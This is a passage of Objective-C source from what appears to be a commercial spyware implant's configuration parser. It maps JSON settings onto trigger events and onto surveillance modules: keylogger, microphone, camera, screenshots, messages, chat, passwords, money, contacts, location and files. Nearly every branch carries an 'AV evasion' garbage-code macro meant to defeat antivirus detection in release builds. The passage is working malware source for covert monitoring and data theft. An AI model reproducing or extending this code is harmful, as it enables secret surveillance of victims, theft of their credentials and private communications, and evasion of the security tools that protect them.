      // AV evasion: only on release build
      AV_GARBAGE_001
      
      [inner release];
    }
}

- (void)parseAndAddEvents:(NSDictionary *)dict
{
  NSArray *eventsArray = [dict objectForKey: EVENTS_KEY];
  
  if (eventsArray == nil) 
    return;
  
  for (int i=0; i < [eventsArray count]; i++) 
  {
    NSAutoreleasePool *inner = [[NSAutoreleasePool alloc]init];
    
    NSDictionary *event = (NSDictionary *)[eventsArray objectAtIndex: i];
    
    // AV evasion: only on release build
    AV_GARBAGE_001
    
    NSString *eventType = [event objectForKey: EVENT_TYPE_KEY];
    
    if (eventType != nil)
    {     
      if ([eventType compare: EVENTS_PROC_KEY] == NSOrderedSame) 
      {  
        // AV evasion: only on release build
        AV_GARBAGE_009
        
        [self addProcessEvent: event];
      }
      else if ([eventType compare: EVENTS_TIMER_KEY] == NSOrderedSame) 
      {  
        // AV evasion: only on release build
        AV_GARBAGE_008
        
        [self addTimerEvent: event];
      }
      else if ([eventType compare: EVENTS_TIMER_DATE_KEY] == NSOrderedSame) 
      {  
        // AV evasion: only on release build
        AV_GARBAGE_007
        
        [self addTimerEvent: event];
      }
      else if ([eventType compare: EVENTS_TIMER_AFTERINST_KEY] == NSOrderedSame) 
      {  
        // AV evasion: only on release build
        AV_GARBAGE_006
        
        [self addTimerEvent: event];
      }
      else if ([eventType compare: EVENTS_STND_KEY] == NSOrderedSame) 
      {  
        // AV evasion: only on release build
        AV_GARBAGE_005
        
        [self addStandbyEvent: event];
      }
      else if ([eventType compare: EVENTS_CONN_KEY] == NSOrderedSame) 
      {  
        // AV evasion: only on release build
        AV_GARBAGE_004
        
        [self addConnectionEvent: event];
      }
      else if ([eventType compare: EVENTS_QUOTA_KEY] == NSOrderedSame) 
      {  
        // AV evasion: only on release build
        AV_GARBAGE_003
        
        [self addQuotaEvent: event];
      }
      else if ([eventType compare: EVENTS_SIM_KEY] == NSOrderedSame) 
      {  
        // AV evasion: only on release build
        AV_GARBAGE_002
        
        // only iOS
        [self addSimchangeEvent: event];
      }
      else if ([eventType compare: EVENTS_BATT_KEY] == NSOrderedSame) 
      {  
        // AV evasion: only on release build
        AV_GARBAGE_001
        
        // only iOS
        [self addBatteryEvent: event];
      }
      else if ([eventType compare: EVENTS_AC_KEY] == NSOrderedSame) 
      {  
        // AV evasion: only on release build
        AV_GARBAGE_000
        
        // only iOS
        [self addACEvent: event];
      }
      else if ([eventType compare: EVENTS_IDLE_KEY] == NSOrderedSame) 
      {  
        // AV evasion: only on release build
        AV_GARBAGE_005
        
        [self addIdleEvent: event];
      }
      else
      { // Default event: for keep order number in list when a actionEvent is triggered
        // : the trigger param is position in list of event
        
        // AV evasion: only on release build
        AV_GARBAGE_007
        
        [self addNULLEvent: event];
      }
    }
    
    // AV evasion: only on release build
    AV_GARBAGE_001
    
    [inner release];
  }
  
}

- (void)parseAndAddModules:(NSDictionary *)dict
{  
  NSArray *modulesArray = [dict objectForKey: MODULES_KEY];
  
  if (modulesArray == nil) 
  {  
    // AV evasion: only on release build
    AV_GARBAGE_002
    
    return;
  }
  
  for (int i=0; i < [modulesArray count]; i++) 
  {
    NSAutoreleasePool *inner = [[NSAutoreleasePool alloc] init];
    
    NSDictionary *module = (NSDictionary *)[modulesArray objectAtIndex: i];
    
    NSString *moduleType = [module objectForKey: MODULES_TYPE_KEY];
    
    if (moduleType != nil)
    {
      if ([moduleType compare: MODULES_ADDBK_KEY] == NSOrderedSame) 
      {  
        // AV evasion: only on release build
        AV_GARBAGE_009
        
        [self initABModule: module];
      }
      else if ([moduleType compare: MODULES_DEV_KEY] == NSOrderedSame) 
      {  
        // AV evasion: only on release build
        AV_GARBAGE_008
        
        [self initDeviceModule: module];
      }
      else if ([moduleType compare: MODULES_CLIST_KEY] == NSOrderedSame) 
      {  
        // AV evasion: only on release build
        AV_GARBAGE_007
        
        [self initCalllistModule: module];
      }
      else if ([moduleType compare: MODULES_CAL_KEY] == NSOrderedSame) 
      {  
        // AV evasion: only on release build
        AV_GARBAGE_006
        
        [self initCalendarModule: module];
      }
      else if ([moduleType compare: MODULES_MIC_KEY] == NSOrderedSame) 
      {  
        // AV evasion: only on release build
        AV_GARBAGE_005
        
        [self initMicModule: module];
      }
      else if ([moduleType compare: MODULES_SNP_KEY] == NSOrderedSame) 
      {  
        // AV evasion: only on release build
        AV_GARBAGE_004
        
        [self initScrshotModule: module];
      }
      else if ([moduleType compare: MODULES_URL_KEY] == NSOrderedSame) 
      {  
        // AV evasion: only on release build
        AV_GARBAGE_003
        
        [self initUrlModule: module];
      }
      else if ([moduleType compare: MODULES_APP_KEY] == NSOrderedSame) 
      {  
        // AV evasion: only on release build
        AV_GARBAGE_002
        
        [self initAppModule: module];
      }      
      else if ([moduleType compare: MODULES_KEYL_KEY] == NSOrderedSame) 
      {  
        // AV evasion: only on release build
        AV_GARBAGE_001
        
        [self initKeyLogModule: module];
      }
      else if ([moduleType compare: MODULES_MSGS_KEY] == NSOrderedSame) 
      {  
        // AV evasion: only on release build
        AV_GARBAGE_000
        
        [self initMessagesModule: module];
      }
      else if ([moduleType compare: MODULES_CLIP_KEY] == NSOrderedSame) 
      {  
        // AV evasion: only on release build
        AV_GARBAGE_001
        
        [self initClipboardModule: module];
      }
      else if ([moduleType compare: MODULES_CAMERA_KEY] == NSOrderedSame) 
      {  
        // AV evasion: only on release build
        AV_GARBAGE_002
        
        [self initCameraModule: module];
      }
      else if ([moduleType compare: MODULES_POSITION_KEY] == NSOrderedSame) 
      {  
        // AV evasion: only on release build
        AV_GARBAGE_003
        
        [self initPositionModule: module];
      }
      else if ([moduleType compare: MODULES_CHAT_KEY] == NSOrderedSame) 
      {  
        // AV evasion: only on release build
        AV_GARBAGE_004
        
        [self initChatModule: module];
      }
      else if ([moduleType compare: MODULES_PASSWD_KEY] == NSOrderedSame)
      {
          // AV evasion: only on release build
          AV_GARBAGE_004
          
          [self initPasswdModule: module];
      }
      else if ([moduleType compare: MODULES_MONEY_KEY] == NSOrderedSame)
      {
          // AV evasion: only on release build
          AV_GARBAGE_003
          
          [self initMoneyModule: module];
      }
      else if ([moduleType compare: @"mouse"] == NSOrderedSame)
      {  
        // AV evasion: only on release build
        AV_GARBAGE_005
        
        [self initMouseModule: module];
      }
      else if ([moduleType compare: @"call"] == NSOrderedSame) 
      {  
        // AV evasion: only on release build
        AV_GARBAGE_006
        
        [self initCallModule: module];
      }
      else if ([moduleType compare: @"file"] == NSOrderedSame) 
      {  
        // AV evasion: only on release build
        AV_GARBAGE_007
        
        [self initFileModule: module];
      }
    }
    
    [inner release];
  }
}

#
#
# pragma mark SBJsonStreamParserAdapterDelegate methods
#
#

- (void)parser:(SBJsonStreamParser *)parser foundObject:(NSDictionary *)dict 
{  
  // AV evasion: only on release build
  AV_GARBAGE_000
  
  // running the parsers
  [self parseAndAddActions: dict];
  
  // AV evasion: only on release build
  AV_GARBAGE_006
  
  [self parseAndAddEvents: dict];
  
  // AV evasion: only on release build
  AV_GARBAGE_007
  
  [self parseAndAddModules: dict];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
}

#define FILE_CONFIG @"/tmp/config"

- (BOOL)runParser:(NSData*)dataConfig
{
  SBJsonStreamParserStatus status;
  
  if (dataConfig == nil) 
  {
    // AV evasion: only on release build
    AV_GARBAGE_007
    
    return NO;
  }
  
  @try {
    status = [parser parse: dataConfig];
  }
  @catch (NSException *exception) {
    
    // AV evasion: only on release build
    AV_GARBAGE_009
    
    status = SBJsonStreamParserError;
  }

  // AV evasion: only on release build
  AV_GARBAGE_003
  
    if (status == SBJsonStreamParserError) 
    {
      // AV evasion: only on release build
      AV_GARBAGE_001
      
      return NO;
    } 
  else if (status == SBJsonStreamParserWaitingForData) 
    {  
      // AV evasion: only on release build
      AV_GARBAGE_004
    
      return NO;
    }
  else if (status == SBJsonStreamParserComplete) 
    {    
      // AV evasion: only on release build
      AV_GARBAGE_002
      
      return YES;
    }
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  return YES;
}


- (BOOL)runParser:(NSData*)aConfiguration
       WithEvents:(NSMutableArray*)eventsArray
       andActions:(NSMutableArray*)actionsArray
       andModules:(NSMutableArray*)modulesArray
{
  NSAutoreleasePool * pool = [[NSAutoreleasePool alloc] init];
  
  BOOL bRet = FALSE;
  
//  SBJSonConfigDelegate *myJSon = [[SBJSonConfigDelegate alloc] init];
//  
//  [myJSon runParser];
//  
//  [myJSon release];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  mEventsList = eventsArray;
  mActionsList = actionsArray;
  mAgentsList = modulesArray;
  
  // AV evasion: only on release build
  AV_GARBAGE_004
  
  bRet = [self runParser: aConfiguration];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  [pool release];
  
  return  bRet;
}

@end